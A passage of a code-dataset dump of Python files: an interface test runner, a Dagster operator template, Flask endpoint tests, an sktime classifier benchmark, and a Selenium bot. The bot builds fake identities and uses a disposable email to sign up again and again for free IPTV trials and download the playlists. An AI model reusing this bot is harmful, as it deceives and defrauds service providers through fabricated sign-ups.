67, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 72, "usage_type": "call"}, {"api_name": "config.TEXT_FONT", "line_number": 76, "usage_type": "argument"}, {"api_name": "config.MATCH_SCALE", "line_number": 77, "usage_type": "argument"}, {"api_name": "config.BLACK_COLOR", "line_number": 78, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 79, "usage_type": "argument"}, {"api_name": "imutils.paths.list_images", "line_number": 85, "usage_type": "call"}, {"api_name": "imutils.paths", "line_number": 85, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.BORDER_DEFAULT", "line_number": 87, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 88, "usage_type": "call"}, {"api_name": "config.RESIZE_SIZE", "line_number": 88, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 93, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 103, "usage_type": "call"}, {"api_name": "config.WHITE_COLOR", "line_number": 107, "usage_type": "argument"}, {"api_name": "cv2.putText", "line_number": 110, "usage_type": "call"}, {"api_name": "config.TEXT_FONT", "line_number": 114, "usage_type": "argument"}, {"api_name": "config.FONT_SCALE", "line_number": 115, "usage_type": "argument"}, {"api_name": "config.BLACK_COLOR", "line_number": 116, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 117, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 122, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 134, "usage_type": "call"}, {"api_name": "config.WHITE_COLOR", "line_number": 138, "usage_type": "argument"}, {"api_name": "cv2.putText", "line_number": 141, "usage_type": "call"}, {"api_name": "config.TEXT_FONT", "line_number": 145, "usage_type": "argument"}, {"api_name": "config.FONT_SCALE", "line_number": 146, "usage_type": "argument"}, {"api_name": "config.BLACK_COLOR", "line_number": 147, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 148, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 153, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 162, "usage_type": "call"}, {"api_name": "config.WHITE_COLOR", "line_number": 166, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 173, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 202, "usage_type": "call"}, {"api_name": "socket.gethostbyname", "line_number": 214, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 214, "usage_type": "call"}, {"api_name": "json.load", "line_number": 227, "usage_type": "call"}, {"api_name": "json.load", "line_number": 243, "usage_type": "call"}, {"api_name": "json.load", "line_number": 259, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 275, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 278, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 284, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 294, "usage_type": "call"}, {"api_name": "config.GREEN_COLOR", "line_number": 298, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 299, "usage_type": "argument"}]} +{"seq_id": "35591668395", "text": "#coding:utf-8\nfrom other.base import RunMethod\nfrom data.get_data import GetData\nimport sys\nsys.path.append(\"D:\\\\www\\\\ImoocInterface\")\n\n\nclass RunTest:\n def __init__(self):\n self.run_method = RunMethod()\n self.data = GetData()\n\n #程序执行的主入口\n def go_on_run(self):\n res = None\n rows_count = self.data.get_case_lines()\n for i in range(1,rows_count):\n url = self.data.get_request_url(i)\n method = self.data.get_request_method(i)\n is_run = self.data.get_is_run(i)\n data = self.data.get_data_for_json(i)\n expect = self.data.get_expect_data(i)\n header = self.data.is_header(i)\n if is_run:\n res = self.run_method.run_main(method,url,data,header)\n if util.common_util.is_contain(expect,res):\n print(\"测试通过\")\n else:\n print(\"测试失败\")\n\n return res\nif __name__ == '__main__':\n run = RunTest()\n print(run.go_on_run())\n\n\n\n\n\n\n", "repo_name": "frank2638/ImoocInterface", "sub_path": "main/run_test.py", "file_name": "run_test.py", "file_ext": "py", "file_size_in_byte": 1058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "other.base.RunMethod", "line_number": 10, "usage_type": "call"}, {"api_name": "data.get_data.GetData", "line_number": 11, "usage_type": "call"}, {"api_name": "data.get_data", "line_number": 21, "usage_type": "name"}, {"api_name": "data.get_data", "line_number": 25, "usage_type": "argument"}]} +{"seq_id": "9886942947", "text": "import logging\n\nfrom dagster_airflow.operators.util import ( # type: ignore # (old airflow)\n invoke_steps_within_python_operator,\n)\nfrom dagster_airflow.vendor.python_operator import PythonOperator # type: ignore # (old airflow)\n\n# Template for creating a custom dagster operator that wraps Airflow PythonOperator.\n# To use, copy this file and stub out lines 14 - 17 with custom logic\n\n\nclass CustomOperator(PythonOperator):\n def __init__(self, dagster_operator_parameters, *args, **kwargs):\n def python_callable(ts, dag_run, **kwargs):\n # Add custom logic here\n logger = logging.getLogger(\"CustomOperatorLogger\")\n logger.setLevel(logging.INFO)\n logger.info(\"CustomOperator is called\")\n\n return invoke_steps_within_python_operator(\n dagster_operator_parameters.invocation_args, ts, dag_run, **kwargs\n )\n\n super(CustomOperator, self).__init__(\n *args,\n task_id=dagster_operator_parameters.task_id,\n provide_context=True,\n python_callable=python_callable,\n dag=dagster_operator_parameters.dag,\n **kwargs,\n )\n", "repo_name": "dagster-io/dagster", "sub_path": "python_modules/dagster-test/dagster_test/dagster_airflow/custom_operator.py", "file_name": "custom_operator.py", "file_ext": "py", "file_size_in_byte": 1184, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8986, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dagster_airflow.vendor.python_operator.PythonOperator", "line_number": 12, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 17, "usage_type": "attribute"}, {"api_name": "dagster_airflow.operators.util.invoke_steps_within_python_operator", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "2727795887", "text": "import unittest, sys\nsys.path.append('..')\nimport event_app.app\nfrom unittest.mock import patch\nfrom pprint import pprint\nimport json\n\nevent = {\n \"keywords\": \"\",\n \"tags\": [],\n \"radius\": \"2mi\",\n \"user_location\": {\n \"lat\": 37.7749300, #default: San Francisco\n \"lng\": -122.4194200\n },\n \"cost\": 20, # upper bound of cost\n \"time\": [],\n \"date\": \"\"\n}\n\nclass EventEndPoint(unittest.TestCase):\n '''testing the logic of the event search Flask endpoint'''\n def setUp(self):\n '''set up Flask test client'''\n event_app.app.app.config['TESTING'] = True\n self.app = event_app.app.app.test_client()\n\n def tearDown(self):\n '''re-initialize event data'''\n event['keywords'] = \"\"\n event['tags'] = []\n event['cost'] = 20\n event['radius'] = \"2mi\"\n\n @staticmethod\n def DBsearch_side_effect(query):\n '''returns different values based on the input query receiveed'''\n print(\"query received\")\n pprint(query)\n all_events = {\n 'query': {\n 'constant_score': {\n 'filter': {\n 'bool': {\n 'must': [\n {'geo_distance': {\n 'distance': \"\",\n 'location': {\n 'lat': 37.77493,\n 'lon': -122.41942\n }\n }\n },\n {'range': {\n 'cost': {\n 'gte': -1,\n 'lte': 0\n }\n }\n }\n ]\n }\n }\n }\n }\n }\n\n event_query = {\n 'query': {\n 'bool': {\n 'filter': {\n 'bool': {\n 'must': [\n {'geo_distance': {\n 'distance': '2mi',\n 'location': {'lat': 37.77493,\n 'lon': -122.41942\n }\n }\n },\n {'range': {\n 'cost': {\n 'gte': -1,\n 'lte': 20\n }\n }\n }\n ]\n }\n },\n 'must': {\n 'multi_match': {\n 'fields': ['name', 'description', 'tags'],\n 'fuzziness': 'AUTO',\n 'query': '',\n 'analyzer': 'event_english'\n }\n }\n }\n }\n }\n if 'constant_score' in query['query']:\n radius = query['query']['constant_score']['filter']['bool']['must'][0]['geo_distance']['distance']\n max_cost = query['query']['constant_score']['filter']['bool']['must'][1]['range']['cost']['lte']\n all_events['query']['constant_score']['filter']['bool']['must'][0]['geo_distance']['distance'] = radius\n all_events['query']['constant_score']['filter']['bool']['must'][1]['range']['cost']['lte'] = max_cost\n\n else:\n query_string = query['query']['bool']['must']['multi_match']['query']\n event_query['query']['bool']['must']['multi_match']['query'] = query_string\n\n # search for all events\n if query == all_events:\n return {'Music': 'a', 'Family': 'b', 'Workshop': 'c'}\n\n # search for event keywords\n elif query == event_query:\n return {'Music': 'Beetles Anniversary'}\n\n else:\n return {'error': 'does not exist'}\n\n\n def get_data(self, event):\n '''send test data from the front end to the endpoint'''\n response = self.app.post(\n '/api/event_search',\n data=json.dumps(event),\n content_type='application/json')\n return response\n\n\n @patch('event_app.app.db.search')\n def test_search_all(self, mock_DB_search):\n ''''Check that \"Any\" event tag generates query for all events'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n\n # data sent from the front end to be parsed and queried\n event['tags'] = [\"Any\"]\n print(\"datat sent\")\n pprint(event)\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n\n @patch('event_app.app.db.search')\n def test_event_tags(self, mock_DB_search):\n '''Check that selected event tags generate appropriate query'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n\n # data sent from the front end to be parsed and queried\n event['tags'] = [\"Festival/Fair\", \"Museums\", \"Theater\"]\n\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'Beetles Anniversary'})\n\n\n @patch('event_app.app.db.search')\n def test_event_keywords(self, mock_DB_search):\n '''Check that event keywords generate appropriate query'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n\n # data sent from the front end to be parsed and queried\n event['keywords'] = \"Beetles Concert SF\"\n\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'Beetles Anniversary'})\n\n\n @patch('event_app.app.db.search')\n def test_cost(self, mock_DB_search):\n '''check that endpoint validates cost range input'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n event['tags'] = ['Any']\n\n event['cost'] = \"100+\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['cost'] = 0\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['cost'] = -140.45\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n '''should I worry about this?\n event['cost'] = 0827428\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n '''\n event['cost'] = \"2de42&&*(\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n event['cost'] = 17.3987175083922340920230712370238939128349014\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n\n @patch('event_app.app.db.search')\n def test_radius(self, mock_DB_search):\n '''check that endpoint validates radius input'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n event['tags'] = ['Any']\n\n event['radius'] = \"-3mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n event['radius'] = \"2.34057198340981209834098103489398734576349714mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['radius'] = \"0mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n event['radius'] = \"00248271mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['radius'] = \"0024.8271mi\"\n response = self.get_data(event)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['radius'] = \"8ne48*%@4mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "tanyastropheus/Events_Near_Me", "sub_path": "tests/test_endpoint.py", "file_name": "test_endpoint.py", "file_ext": "py", "file_size_in_byte": 9236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 21, "usage_type": "attribute"}, {"api_name": "event_app.app.app", "line_number": 25, "usage_type": "attribute"}, {"api_name": "event_app.app", "line_number": 25, "usage_type": "name"}, {"api_name": "event_app.app.app.app.test_client", "line_number": 26, "usage_type": "call"}, {"api_name": "event_app.app.app", "line_number": 26, "usage_type": "attribute"}, {"api_name": "event_app.app", "line_number": 26, "usage_type": "name"}, {"api_name": "pprint.pprint", "line_number": 39, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 128, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 141, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 144, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 133, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 158, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 148, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 172, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 162, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 185, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 191, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 210, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 176, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 227, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 237, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 242, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 214, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 251, "usage_type": "call"}]} +{"seq_id": "9893926192", "text": "from genericpath import isfile\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport random\nimport csv\nimport threading\nimport os\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nchrome_options = Options()\n# chrome_options.add_argument(\"--headless\")\nchrome_options.add_argument('window-size=1920x1080')\nchrome_options.add_argument(\"--disable-gpu\")\nprefs = {'download.default_directory' : 'iptv_daily'}\nchrome_options.add_experimental_option('prefs', prefs)\n\ndef who():\n global company, email, zipcode, first, last, job, phone, street_address, macos, state, ios\n company = open('company.csv').read().splitlines()\n company =random.choice(company)\n print(company)\n if \" \" in company:\n company = company.split(\" \")\n company = company[0]\n print(company)\n else:\n pass\n print(company)\n\n zipcode = open('zipcode.csv').read().splitlines()\n zipcode =random.choice(zipcode)\n zipcode = zipcode.split(\",\")\n state = zipcode[1]\n zipcode = zipcode[0]\n print(zipcode)\n print(state)\n\n first = open('firstnames.txt').read().splitlines()\n first =random.choice(first)\n print(first)\n\n last = open('last.csv').read().splitlines()\n last =random.choice(last)\n print(last)\n url = [\".com\", \".org\", \".net\", \".co\", \".ai\", \".io\"]\n url = random.choice(url)\n\n email = [f'{first}{last}@{company}{url}', f'{first[0]}{last}@{company}{url}', f\"{first[0]}{last[0]}@{company}{url}\", f\"{last[0]}{first}@{company}{url}\", f\"{first}@{company}{url}\" ]\n email = random.choice(email)\n print(email)\n\n phone = random.randint(1111111111,9999999999)\n print(phone)\n\n # job = [\"Ceo\", \"COO\", \"Head of Security\", \"Business Manager\", \"Security Officer\", \"CFO\", \"Admin\", \"HR Manager\", \"IT Manager\", \"Director of IT\", \"Director of Security\", \"Information Security Analyst\", \"Network Security Administrator\", \"Cyber Crime Investigator\", \"Network Security Engineer\", \"Security Manager\"]\n # job = random.choice(job)\n # print(job)\n\n street_address_number = str(random.randint(1,2000))\n street_address = street_address_number + \" \" + company\n # ios = random.randint(10, 2000)\n\nclass free_iptv_auto:\n \n def __init__(self):\n self.driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)\n\n\n def free_trial(self):\n ## Open tempmail\n self.driver.get(\"https://www.disposablemail.com/\")\n sleep(5)\n get_email = self.driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div[1]/div[1]/div/div[1]/div/div[5]/span')\n get_email = get_email.text\n print(get_email)\n self.driver.find_element_by_tag_name('body').send_keys(Keys.COMMAND + 't') \n sleep(5)\n\n\n ## Order free IPTV\n self.driver.get(\"https://free.viewsible.com/trial\")\n sleep(5)\n select_m3u = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div[2]/form/div/div[1]/div[4]/div[1]/select/option[2]')\n select_m3u.click()\n yes_usa = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div[2]/form/div/div[1]/div[4]/div[6]/select/option[2]')\n yes_usa.click()\n continue_button = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div[2]/form/div/div[2]/div/div[2]/button')\n continue_button.click()\n sleep(2)\n checkout = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div[2]/div[2]/div[2]/div/div[2]/div[5]/a[1]')\n checkout.click()\n\n\n\n\n\n\n email_field = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[2]/div[3]/div[3]/div/input')\n email_field.send_keys(get_email)\n first_field = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[2]/div[3]/div[1]/div/input')\n first_field.send_keys(first)\n last_field = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[2]/div[3]/div[2]/div/input')\n last_field.send_keys(last)\n generate_password = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[3]/div[2]/div[2]/div/input')\n generate_password.send_keys('pass!diek83')\n generate_password_confirm = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[3]/div[2]/div[3]/div/input')\n generate_password_confirm.send_keys('pass!diek83')\n submit = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[13]/button')\n submit.click()\n sleep(15)\n\n ### Open Tab to email confirmation\n self.driver.get(\"https://www.disposablemail.com/\")\n\n sleep(360)\n self.driver.get('https://www.disposablemail.com/window/id/3')\n try:\n username = self.driver.find_element_by_xpath('/html/body/table/tbody/tr/td/table/tbody/tr/td/table[3]/tbody/tr/td/table[1]/tbody/tr/td/div[4]/blockquote/p[6]').text\n print(username)\n print('firstone')\n except:\n username = self.driver.find_element_by_xpath('/html/body/table/tbody/tr/td/table/tbody/tr/td/table[3]/tbody/tr/td/table[1]/tbody/tr/td/div[4]/blockquote/p[6]').text()\n print(username)\n print('secondone')\n \n\n\n \n\n ###Downloading the m3u\n self.driver.get('https://best-usa-hosting.com/clientarea.php?action=services')\n sleep(3)\n my_iptv = self.driver.find_element_by_xpath('/html/body/center/font/b/center/center/center/center/center/center/section[3]/div/div/div[3]/div/div[1]/div[1]/table/tbody/tr[1]')\n my_iptv.click()\n sleep(2)\n iptv_details = self.driver.find_element_by_xpath('/html/body/center/font/b/center/center/center/center/center/center/section[3]/div/div/div[3]/div/div[1]/div/div[5]/div[1]/form/button')\n iptv_details.click()\n iptv_link = self.driver.find_element_by_xpath('/html/body/center/font/b/center/center/center/center/center/center/section[3]/div/div/div[3]/div/div[1]/center/a')\n save_link = iptv_link.get_attribute('href')\n self.driver.get(save_link)\n print(f'downloaded started. file name is {save_link}')\n sleep(120)\n if os.path.isfile(\"busa.one*\"):\n os.remove(\"iptv_daily/iptv_daily_update.m3u\")\n print('file removed')\n folder = r'iptv_daily/'\n count = 1\n # count increase by 1 in each iteration\n # iterate all files from a directory\n for file_name in os.listdir(folder):\n # Construct old file name\n source = folder + file_name\n\n # Adding the count to the new file name and extension\n destination = folder + \"iptv_daily_update.m3u\"\n\n # Renaming the file\n os.rename(source, destination)\n count += 1\n\n print('New Names are')\n # verify the result\n res = os.listdir(folder)\n print(res)\n print(\"finished\")\n\n else:\n print('no change')\n pass\n \n \n\n\n\n\n\n\ndef do_requests():\n who()\n bot = free_iptv_auto()\n bot.free_trial()\n\ndo_requests()\n\n", "repo_name": "zacnicholson/iptv_daily_update", "sub_path": "free_iptv_new_site.py", "file_name": "free_iptv_new_site.py", "file_ext": "py", "file_size_in_byte": 7785, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 12, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 33, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 48, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 51, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 54, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 61, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 68, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.COMMAND", "line_number": 78, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 91, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 112, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 117, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 134, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 137, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 146, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 152, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 160, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 165, "usage_type": "call"}]} +{"seq_id": "23514305447", "text": "# Import of relevent sktime and sktime module information\r\n\r\nfrom sktime.classification.interval_based import TimeSeriesForestClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sktime.classification.distance_based import KNeighborsTimeSeriesClassifier\r\nfrom sklearn import svm\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sktime.transformations.panel.shapelets import ContractedShapeletTransform\r\nfrom sktime.transformations.panel.pca import PCATransformer\r\nfrom sktime.utils.data_processing import from_2d_array_to_nested\r\nfrom sktime.utils.data_processing import from_3d_numpy_to_nested\r\nfrom sktime.utils.data_processing import from_nested_to_2d_array\r\nfrom sktime.utils.data_processing import from_nested_to_3d_numpy\r\nfrom sktime.transformations.panel.rocket import Rocket\r\nfrom sktime.transformations.panel.tsfresh import TSFreshFeatureExtractor\r\nfrom sktime.transformations.panel.summarize import RandomIntervalFeatureExtractor\r\nfrom sktime.utils.slope_and_trend import _slope\r\nfrom sktime.utils.data_io import load_from_tsfile_to_dataframe\r\nfrom sktime.transformations.panel.dictionary_based import SFA\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom numpy.fft import fft\r\nimport math\r\nfrom scipy.fft import ifftn\r\nfrom sktime.transformations.series.acf import AutoCorrelationTransformer\r\nfrom sklearn.preprocessing import PowerTransformer\r\nfrom sktime.transformations.panel.reduce import Tabularizer\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nimport sktime\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nDATA_PATH = os.path.join(os.path.dirname(sktime.__file__), \"C:\\\\Users\\\\James\\\\Documents\\\\uni\\\\CompMasters\\\\Diss\\\\Univariate_ts\")\r\n\r\ndatasets_trainA = [\"GunPoint\", \"ArrowHead\",\"Beef\",\"Lightning2\",\"Lightning7\",\"ECG200\",\"Adiac\",\"FaceFour\",\"FiftyWords\",\"CBF\",\"Fish\"]\r\ndatasets_testA = datasets_trainA\r\n\r\ndatasets_train = []\r\ndatasets_test = []\r\n\r\nfor i in range(len(datasets_trainA)):\r\n datasets_train.append(datasets_trainA[i] + str(\"\\\\\") + datasets_trainA[i] + str(\"_TRAIN.ts\"))\r\nfor i in range(len(datasets_testA)):\r\n datasets_test.append(datasets_testA[i] + str(\"\\\\\") + datasets_testA[i] + str(\"_TEST.ts\"))\r\n\r\nclassifier_Knn = KNeighborsTimeSeriesClassifier(n_neighbors=1, distance=\"euclidean\")\r\nclassifier_DTW = KNeighborsTimeSeriesClassifier(n_neighbors=1, distance=\"dtw\")\r\n\r\npipeline_pst_knn = Pipeline(\r\n [\r\n (\r\n \"pst\",\r\n PowerTransformer())\r\n ,\r\n (\"knn\", KNeighborsClassifier(n_neighbors = 3)),\r\n ]\r\n)\r\n\r\npipeline_act_knn = Pipeline(\r\n [\r\n #(\"act\", AutoCorrelationTransformer()),\r\n (\"knn\", KNeighborsClassifier(n_neighbors = 3)),\r\n ]\r\n)\r\n\r\npipeline_pca_knn = Pipeline(\r\n [\r\n (\"ss\", StandardScaler()),\r\n (\"pca\", PCA()),\r\n (\"knn\", KNeighborsClassifier(n_neighbors = 3))\r\n ]\r\n)\r\nact = AutoCorrelationTransformer()\r\n\r\n#bundle up the classifiers\r\nclfs = [ classifier_Knn, classifier_DTW, pipeline_pst_knn, pipeline_act_knn, pipeline_pca_knn]\r\nnames = [\"Euclidean\", \"DTW\", \"powerknn\", \"actknn\", \"pcaknn\"]\r\ntable = {'Classifier':names}\r\ntable = pd.DataFrame(table)\r\n\r\n\r\nfor k, j in zip(datasets_train, datasets_test):\r\n train_x, train_y = load_from_tsfile_to_dataframe(\r\n os.path.join(DATA_PATH, k))\r\n test_x, test_y = load_from_tsfile_to_dataframe(\r\n os.path.join(DATA_PATH, j))\r\n pcas = []\r\n \r\n #fit the classifiers with the data\r\n for clf in clfs:\r\n if clf in [pipeline_pst_knn, pipeline_pca_knn]:\r\n xs = from_nested_to_2d_array(train_x) \r\n clf.fit(xs,train_y)\r\n\r\n elif clf in [pipeline_act_knn]:\r\n xs = from_nested_to_2d_array(train_x)\r\n xs = np.asarray(xs, dtype='float64')\r\n x_hat = [act.fit_transform(xs[i],train_y) for i in range(len(train_x))]\r\n clf.fit(x_hat,train_y)\r\n else: \r\n clf.fit(train_x, train_y)\r\n \r\n\r\n #get the predictions for each classifier\r\n clf_preds = []\r\n for clf in clfs:\r\n if clf in [pipeline_pst_knn, pipeline_pca_knn]:\r\n xt = from_nested_to_2d_array(test_x)\r\n clf_preds.append([clf.predict(xt)])\r\n elif clf in [pipeline_act_knn]:\r\n xt = from_nested_to_2d_array(test_x)\r\n xt = np.asarray(xt, dtype='float64')\r\n x_hat = [act.transform(xt[i],test_y) for i in range(len(test_x))]\r\n clf_preds.append([clf.predict(x_hat)])\r\n else:\r\n clf_preds.append([clf.predict(test_x)])\r\n\r\n #get the accuracy score for each classifer\r\n accs = []\r\n\r\n for clf_p in clf_preds:\r\n\r\n accs.append([accuracy_score(test_y, clf_p[0])])\r\n\r\n #get the index of the best accuracy\r\n index = np.argmax(accs)\r\n\r\n #get the index of the best accuracy\r\n index = np.argmax(accs)\r\n\r\n #print(\"best classifier is:\", names[index], \" with an accuracy of: \", accs[index])\r\n np.sort(accs)\r\n data = {'classifier':names, 'accuracy':accs}\r\n data = pd.DataFrame(data)\r\n data[\"Rank\"] = len(names) - data[\"accuracy\"].rank() + 1\r\n table[f'Accuracy {k[0:10]}'] = data[\"accuracy\"]\r\n table[f'Rank {k[0:10]}'] = data[\"Rank\"]\r\na = table.iloc[:,::2]\r\na = a.iloc[: , 1:]\r\ntable['AVG Rank'] = a.mean(axis=1)\r\nprint(table)\r\n", "repo_name": "JamesMayGeo/Diss", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 5413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, 